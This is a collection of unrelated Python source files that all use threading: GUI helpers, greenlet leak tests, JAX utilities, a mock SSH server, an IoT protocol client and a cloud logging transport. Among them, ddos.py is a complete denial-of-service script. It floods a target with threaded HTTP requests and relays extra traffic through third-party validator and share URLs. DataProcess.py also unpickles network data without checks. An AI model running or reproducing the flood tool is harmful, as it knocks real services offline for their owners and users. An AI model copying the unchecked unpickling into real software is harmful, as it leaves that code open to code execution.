*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs
):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(
target=read_stream, daemon=True, args=(proc.stdout, out_lines)
)
t_err = threading.Thread(
target=read_stream, daemon=True, args=(proc.stderr, err_lines)
)
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target,
tearoff=False,
postcommand=self.on_post,
**get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, kind, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(kind, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label="Cut", command=self.on_cut, tester=self.can_cut)
self.add_command(label="Copy", command=self.on_copy, tester=self.can_copy)
self.add_command(label="Paste", command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label="Select All", command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master,
text=text if text else url,
style="Url.TLabel",
cursor="hand2",
font=url_font,
)
url_label.grid()
url_label.bind("<Button-1>", lambda _: webbrowser.open(url))
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
if __name__ == "__main__":
root = tk.Tk()
closa = ClosableNotebook(root)
closa.add(ttk.Button(closa, text="B1"), text="B1")
closa.add(ttk.Button(closa, text="B2"), text="B2")
closa.grid()
root.mainloop()
|
test_leaks.py
|
import unittest
import sys
import gc
import time
import weakref
import greenlet
import threading
class ArgRefcountTests(unittest.TestCase):
def test_arg_refs(self):
args = ('a', 'b', 'c')
refcount_before = sys.getrefcount(args)
g = greenlet.greenlet(
lambda *args: greenlet.getcurrent().parent.switch(*args))
for i in range(100):
g.switch(*args)
self.assertEqual(sys.getrefcount(args), refcount_before)
def test_kwarg_refs(self):
kwargs = {}
g = greenlet.greenlet(
lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
for i in range(100):
g.switch(**kwargs)
self.assertEqual(sys.getrefcount(kwargs), 2)
if greenlet.GREENLET_USE_GC:
# These only work with greenlet gc support
def recycle_threads(self):
# By introducing a thread that does sleep we allow other threads,
# that have triggered their __block condition, but did not have a
# chance to deallocate their thread state yet, to finally do so.
# The way it works is by requiring a GIL switch (different thread),
# which does a GIL release (sleep), which might do a GIL switch
# to finished threads and allow them to clean up.
def worker():
time.sleep(0.001)
t = threading.Thread(target=worker)
t.start()
time.sleep(0.001)
t.join()
def test_threaded_leak(self):
gg = []
def worker():
# only main greenlet present
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
self.recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
def test_threaded_adv_leak(self):
gg = []
def worker():
# main and additional *finished* greenlets
ll = greenlet.getcurrent().ll = []
def additional():
ll.append(greenlet.getcurrent())
for i in range(2):
greenlet.greenlet(additional).switch()
gg.append(weakref.ref(greenlet.getcurrent()))
for i in range(2):
t = threading.Thread(target=worker)
t.start()
t.join()
del t
greenlet.getcurrent() # update ts_current
self.recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertTrue(g() is None)
|
jax_utils.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for JAX."""
import queue
import threading
from typing import Iterable, Generator, TypeVar
from absl import logging
from acme import types
import haiku as hk
from jax import tree_util
import jax.numpy as jnp
import numpy as np
import tree
def add_batch_dim(values: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.expand_dims(x, axis=0), values)
@hk.transform
def _flatten(x, num_batch_dims: int):
return hk.Flatten(preserve_dims=num_batch_dims)(x)
def batch_concat(
values: types.NestedArray,
num_batch_dims: int = 1,
) -> jnp.ndarray:
"""Flatten and concatenate nested array structure, keeping batch dims."""
flatten_fn = lambda x: _flatten.apply(None, x, num_batch_dims)
flat_leaves = tree.map_structure(flatten_fn, values)
return jnp.concatenate(tree.flatten(flat_leaves), axis=-1)
def zeros_like(nest: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.zeros(x.shape, x.dtype), nest)
def squeeze_batch_dim(nest: types.Nest) -> types.NestedArray:
return tree_util.tree_map(lambda x: jnp.squeeze(x, axis=0), nest)
def to_numpy_squeeze(values: types.Nest) -> types.NestedArray:
"""Converts to numpy and squeezes out dummy batch dimension."""
return tree_util.tree_map(lambda x: np.array(x).squeeze(axis=0), values)
def batch_to_sequence(values: types.Nest) -> types.NestedArray:
return tree_util.tree_map(
lambda x: jnp.transpose(x, axes=(1, 0, *range(2, len(x.shape)))), values)
T = TypeVar('T')
def prefetch(iterable: Iterable[T],
buffer_size: int = 5) -> Generator[T, None, None]:
"""Performs prefetching of elements from an iterable in a separate thread.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe
buffer_size (int): Number of elements to keep in the prefetch buffer.
Yields:
Prefetched elements from the original iterable.
Raises:
ValueError if the buffer_size <= 1.
Any error thrown by the iterable_function. Note this is not raised inside
the producer, but after it finishes executing.
"""
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
for item in iterable:
buffer.put(item)
except Exception as e: # pylint: disable=broad-except
logging.exception('Error in producer thread for %s', iterable.__name__)
producer_error.append(e)
finally:
buffer.put(end)
# Start the producer thread.
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
|
DataProcess.py
|
#!/usr/bin/env python
# coding: utf-8
__author__ = 'whoami'
"""
@version: 1.0
@author: whoami
@license: Apache Licence 2.0
@contact: skynet@gmail.com
@site: http://www.itweet.cn
@software: PyCharm Community Edition
@file: DataProcess.py
@time: 2015-12-29 下午4:25
"""
import ActionProcess
import Tools
import pickle
import threading,os
import datetime
import global_settings
from db import InfluxdbClient
class DataProcess(object):
def __init__(self):
self.hosts = Tools.all_host_configs()
self.db = InfluxdbClient.InfluxdbClient()
def handle(self,msg):
# print 'recv:',msg
# print '>> process data:: %s' % pickle.loads(msg)
data = pickle.loads(msg)
for k,msg in data.items():
fun_name = k.split('::')[0]
time = k.split('::')[1]
ActionProcess.action_process(self, fun_name, time, msg)
print '---------waiting for new msg ---------'
# received data
for host,val in self.hosts['hosts'].items():
if val:
t = threading.Thread(target=self.process,args=[host,val])
t.start()
else:
print '%s host monitor info is null...' % host
def forward(self,msg):
print '-------starting Processing data---------'
self.handle(msg)
def process(self,host,val):
print 'Task %s runs pid %s' % (host,os.getpid())
tags = {
"host": "%s" % host,
"region": "us-west"
}
for v in val.values():
timestamp = float(v['timestamp'])
time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
measurement = v['data'].keys()[0]
data = v['data'].values()[0]
self.db.wirte_points(tags,measurement,time,data)
# clear service_instance data object
self.hosts['hosts'][host].clear()
|
concurrent.py
|
"""
@Author Jay Lee
My attempt to provide a set of generic functions
that enable ease of leverage of the power that
concurrency brings to programs.
TODO: Work on this during my downtime
"""
import multiprocessing as mp
def parallel_process(handler_fn, *args, process_count=5):
"""
A function that causes a feature to run in parallel.
Note that it is highly recommended to not add
:return:
"""
outputs = mp.Queue()
processes = [mp.Process(target=handler_fn, args=(outputs, args)) for i in range(process_count)]
for process in processes:
process.start()
for p in processes:
p.join()
results = [outputs.get() for process in processes]
return results
def process_in_parallel(process_count=5, tasks=[]):
"""
General-purpose function for programming
:param process_count: The number of processes used
for the given task
:return:
"""
outputs = mp.Queue()
def parallel_process_decorator(process_fn):
"""
:param process_fn: The function that is being "decorated"
:return:
"""
def output_fn(*args, **kwargs):
def handler_fn(task, task_no):
print(f"task: {task}. Task no: {task_no}")
output = process_fn(task, task_no, *args, **kwargs)
outputs.put(output)
return output
processes = [mp.Process(target=handler_fn, args=(tasks[i], i)) for i in range(len(tasks))]
for process in processes:
process.start()
# Exit completed processes
for p in processes:
p.join()
# Store results in list
results = [outputs.get() for process in processes]
return results
return output_fn
return parallel_process_decorator
if __name__ == "__main__":
import random
import string
tasks = [1, 2, 3, 4, 5, 6]
@process_in_parallel(process_count=7, tasks=tasks)
def double_number(task, task_no):
print(f"Handling task: {task}. Process no: {task_no}")
return task * 2
test = double_number()
print(f"Final output: {test}")
|
server.py
|
import logging
import os
import select
import socket
import subprocess
import threading
try:
from queue import Queue
except ImportError: # Python 2.7
from Queue import Queue
import paramiko
from mockssh import sftp
__all__ = [
"Server",
]
SERVER_KEY_PATH = os.path.join(os.path.dirname(__file__), "server-key")
class Handler(paramiko.ServerInterface):
log = logging.getLogger(__name__)
def __init__(self, server, client_conn):
self.server = server
self.thread = None
self.command_queues = {}
client, _ = client_conn
self.transport = t = paramiko.Transport(client)
t.add_server_key(paramiko.RSAKey(filename=SERVER_KEY_PATH))
t.set_subsystem_handler("sftp", sftp.SFTPServer)
def run(self):
self.transport.start_server(server=self)
while True:
channel = self.transport.accept()
if channel is None:
break
if channel.chanid not in self.command_queues:
self.command_queues[channel.chanid] = Queue()
t = threading.Thread(target=self.handle_client, args=(channel,))
t.setDaemon(True)
t.start()
def handle_client(self, channel):
try:
command = self.command_queues[channel.chanid].get(block=True)
self.log.debug("Executing %s", command)
p = subprocess.Popen(command, shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
channel.sendall(stdout)
channel.sendall_stderr(stderr)
channel.send_exit_status(p.returncode)
except Exception:
self.log.error("Error handling client (channel: %s)", channel,
exc_info=True)
finally:
channel.close()
def check_auth_publickey(self, username, key):
try:
_, known_public_key = self.server._users[username]
except KeyError:
self.log.debug("Unknown user '%s'", username)
return paramiko.AUTH_FAILED
if known_public_key == key:
self.log.debug("Accepting public key for user '%s'", username)
return paramiko.AUTH_SUCCESSFUL
self.log.debug("Rejecting public ley for user '%s'", username)
return paramiko.AUTH_FAILED
def check_channel_exec_request(self, channel, command):
self.command_queues.setdefault(channel.get_id(), Queue()).put(command)
return True
def check_channel_request(self, kind, chanid):
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def get_allowed_auths(self, username):
return "publickey"
class Server(object):
host = "127.0.0.1"
log = logging.getLogger(__name__)
def __init__(self, users):
self._socket = None
self._thread = None
self._users = {}
for uid, private_key_path in users.items():
self.add_user(uid, private_key_path)
def add_user(self, uid, private_key_path, keytype="ssh-rsa"):
if keytype == "ssh-rsa":
key = paramiko.RSAKey.from_private_key_file(private_key_path)
elif keytype == "ssh-dss":
key = paramiko.DSSKey.from_private_key_file(private_key_path)
elif keytype in paramiko.ECDSAKey.supported_key_format_identifiers():
key = paramiko.ECDSAKey.from_private_key_file(private_key_path)
elif keytype == "ssh-ed25519":
key = paramiko.Ed25519Key.from_private_key_file(private_key_path)
else:
raise Exception("Unable to handle key of type {}".format(keytype))
self._users[uid] = (private_key_path, key)
def __enter__(self):
self._socket = s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((self.host, 0))
s.listen(5)
self._thread = t = threading.Thread(target=self._run)
t.setDaemon(True)
t.start()
return self
def _run(self):
sock = self._socket
while sock.fileno() > 0:
self.log.debug("Waiting for incoming connections ...")
rlist, _, _ = select.select([sock], [], [], 1.0)
if rlist:
conn, addr = sock.accept()
self.log.debug("... got connection %s from %s", conn, addr)
handler = Handler(self, (conn, addr))
t = threading.Thread(target=handler.run)
t.setDaemon(True)
t.start()
def __exit__(self, *exc_info):
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except Exception:
pass
self._socket = None
self._thread = None
def client(self, uid):
private_key_path, _ = self._users[uid]
c = paramiko.SSHClient()
host_keys = c.get_host_keys()
key = paramiko.RSAKey.from_private_key_file(SERVER_KEY_PATH)
host_keys.add(self.host, "ssh-rsa", key)
host_keys.add("[%s]:%d" % (self.host, self.port), "ssh-rsa", key)
c.set_missing_host_key_policy(paramiko.RejectPolicy())
c.connect(hostname=self.host,
port=self.port,
username=uid,
key_filename=private_key_path,
allow_agent=False,
look_for_keys=False)
return c
@property
def port(self):
return self._socket.getsockname()[1]
@property
def users(self):
return self._users.keys()
|
ddos.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Lwa Ddos SCRİPT
#ÇALAN İTİNA İLE SEVİLİR
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Lottery Whirte Angels DDOS
ArifReis-Lexie
Kullanım : python3 ddos.py [-s] [-p] [-t]
-h : yardım
-s : server ip
-p : port normal 80
-t : turbo normal 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="Çıkkma",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="Server İp")
optp.add_option("-p","--port",type="int",dest="port",help="Port")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="Zaman")
optp.add_option("-h","--help",dest="help",action='store_true',help="Yardım Menüsü")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
pseudo-library.py
|
#!/usr/bin/python
'''
This is a pseudo-library implementation
Example:
./pseudo-library.py -t b168ccc8c8734fad98323247afbc1113 --dump
Author: Volodymyr Shymanskyy
License: The MIT license
'''
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hs:p:t:",
["help", "server=", "port=", "token=", "sndbuf=", "rcvbuf=", "nodelay=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
SERVER = "blynk-cloud.com"
PORT = 8442
NODELAY = 1 # TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
TOKEN = "YourAuthToken"
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-s", "--server"):
SERVER = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("-t", "--token"):
TOKEN = v
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
BRIDGE = 15
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, genMsgId(), len(data)) + data
def handle_hw(data):
params = data.split("\0")
cmd = params.pop(0)
if cmd == 'info':
pass
### DIRECT pin operations
elif cmd == 'pm':
pairs = zip(params[0::2], params[1::2])
for (pin, mode) in pairs:
pin = int(pin)
if mode == 'in':
log("Pin %d mode INPUT" % pin)
elif mode == 'out':
log("Pin %d mode OUTPUT" % pin)
elif mode == 'pu':
log("Pin %d mode INPUT_PULLUP" % pin)
elif mode == 'pd':
log("Pin %d mode INPUT_PULLDOWN" % pin)
else:
log("Unknown pin %d mode: %s" % (pin, mode))
elif cmd == 'dw':
pin = int(params.pop(0))
val = params.pop(0)
log("Digital write pin %d, value %s" % (pin, val))
elif cmd == 'aw':
pin = int(params.pop(0))
val = params.pop(0)
log("Analog write pin %d, value %s" % (pin, val))
elif cmd == 'dr': # This should read digital pin
pin = int(params.pop(0))
log("Digital read pin %d" % pin)
conn.sendall(hw("dw", pin, 1)) # Send value
elif cmd == 'ar': # This should do ADC read
pin = int(params.pop(0))
log("Analog read pin %d" % pin)
conn.sendall(hw("aw", pin, 123)) # Send value
### VIRTUAL pin operations
elif cmd == 'vw': # This should call user handler
pin = int(params.pop(0))
val = params.pop(0)
log("Virtual write pin %d, value %s" % (pin, val))
elif cmd == 'vr': # This should call user handler
pin = int(params.pop(0))
log("Virtual read pin %d" % pin)
conn.sendall(hw("vw", pin, "hello")) # Send value
else:
log("Unknown HW cmd: %s" % cmd)
static_msg_id = 1
def genMsgId():
global static_msg_id
static_msg_id += 1
return static_msg_id
# Other utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = ''
try:
r = sock.recv(length-l)
except socket.timeout:
continue
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn):
while (True):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.PING:
log("Got ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW or msg_type == MsgType.BRIDGE:
data = receive(conn, msg_len)
# Print HW message
dump("> " + " ".join(data.split("\0")))
handle_hw(data)
else:
log("Unknown msg type")
break
def writethread(conn):
while (True):
time.sleep(10)
log("Sending heartbeat...")
conn.sendall(hdr.pack(MsgType.PING, genMsgId(), 0))
# Main code
log('Connecting to %s:%d' % (SERVER, PORT))
try:
conn = socket.create_connection((SERVER, PORT), 3)
except:
log("Can't connect")
sys.exit(1)
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
# Authenticate
conn.sendall(hdr.pack(MsgType.LOGIN, genMsgId(), len(TOKEN)))
conn.sendall(TOKEN)
data = receive(conn, hdr.size)
if not data:
log("Auth timeout")
sys.exit(1)
msg_type, msg_id, status = hdr.unpack(data)
dump("Got {0}, {1}, {2}".format(msg_type, msg_id, status))
if status != MsgStatus.OK:
log("Auth failed: %d" % status)
sys.exit(1)
wt = Thread(target=readthread, args=(conn,))
rt = Thread(target=writethread, args=(conn,))
wt.start()
rt.start()
wt.join()
rt.join()
conn.close()
|
background_thread.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transport for Python logging handler
Uses a background worker to log to Stackdriver Logging asynchronously.
"""
import atexit
import copy
import threading
from google.cloud.logging.handlers.transports.base import Transport
_WORKER_THREAD_NAME = 'google.cloud.logging.handlers.transport.Worker'
class _Worker(object):
"""A threaded worker that writes batches of log entries
Writes entries to the logger API.
This class reuses a single :class:`Batch` method to write successive
entries.
Currently, the only public methods are constructing it (which also starts
it) and enqueuing :class:`Logger` (record, message) pairs.
"""
def __init__(self, logger):
self.started = False
self.stopping = False
self.stopped = False
# _entries_condition is used to signal from the main thread whether
# there are any waiting queued logger entries to be written
self._entries_condition = threading.Condition()
# _stop_condition is used to signal from the worker thread to the
# main thread that it's finished its last entries
self._stop_condition = threading.Condition()
# This object continually reuses the same :class:`Batch` object to
# write multiple entries at the same time.
self.logger = logger
self.batch = self.logger.batch()
self._thread = None
# Number in seconds of how long to wait for worker to send remaining
self._stop_timeout = 5
self._start()
def _run(self):
"""The entry point for the worker thread.
Loops until ``stopping`` is set to :data:`True`, and commits batch
entries written during :meth:`enqueue`.
"""
try:
self._entries_condition.acquire()
self.started = True
while not self.stopping:
if len(self.batch.entries) == 0:
# branch coverage of this code extremely flaky
self._entries_condition.wait() # pragma: NO COVER
if len(self.batch.entries) > 0:
self.batch.commit()
finally:
self._entries_condition.release()
# main thread may be waiting for worker thread to finish writing its
# final entries. here we signal that it's done.
self._stop_condition.acquire()
self._stop_condition.notify()
self._stop_condition.release()
def _start(self):
"""Called by this class's constructor
This method is responsible for starting the thread and registering
the exit handlers.
"""
try:
self._entries_condition.acquire()
self._thread = threading.Thread(
target=self._run, name=_WORKER_THREAD_NAME)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._entries_condition.release()
atexit.register(self._stop)
def _stop(self):
"""Signals the worker thread to shut down
Also waits for ``stop_timeout`` seconds for the worker to finish.
This method is called by the ``atexit`` handler registered by
:meth:`start`.
"""
if not self.started or self.stopping:
return
# lock the stop condition first so that the worker
# thread can't notify it's finished before we wait
self._stop_condition.acquire()
# now notify the worker thread to shutdown
self._entries_condition.acquire()
self.stopping = True
self._entries_condition.notify()
self._entries_condition.release()
# now wait for it to signal it's finished
self._stop_condition.wait(self._stop_timeout)
self._stop_condition.release()
self.stopped = True
def enqueue(self, record, message):
"""Queues up a log entry to be written by the background thread."""
try:
self._entries_condition.acquire()
if self.stopping:
return
info = {'message': message, 'python_logger': record.name}
self.batch.log_struct(info, severity=record.levelname)
self._entries_condition.notify()
finally:
self._entries_condition.release()
class BackgroundThreadTransport(Transport):
"""Aysnchronous transport that uses a background thread.
Writes logging entries as a batch process.
"""
def __init__(self, client, name):
http = copy.deepcopy(client._http)
self.client = client.__class__(
client.project, client._connection.credentials, http)
logger = self.client.logger(name)
self.worker = _Worker(logger)
def send(self, record, message):
"""Overrides Transport.send().
:type record: :class:`logging.LogRecord`
:param record: Python log record that the handler was called with.
:type message: str
:param message: The message from the ``LogRecord`` after being
formatted by the associated log formatters.
"""
self.worker.enqueue(record, message)
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.4.6"
__license__ = "BSD"
import io, os, subprocess, wave, aifc, base64
import math, audioop, collections, threading
import platform, stat, random, uuid
import json
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
# define exceptions
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz).
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some machines, such as some Raspberry Pi models, can't keep up if this value is too high.
Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also makes detection less sensitive. This value, generally, should be left at its default.
"""
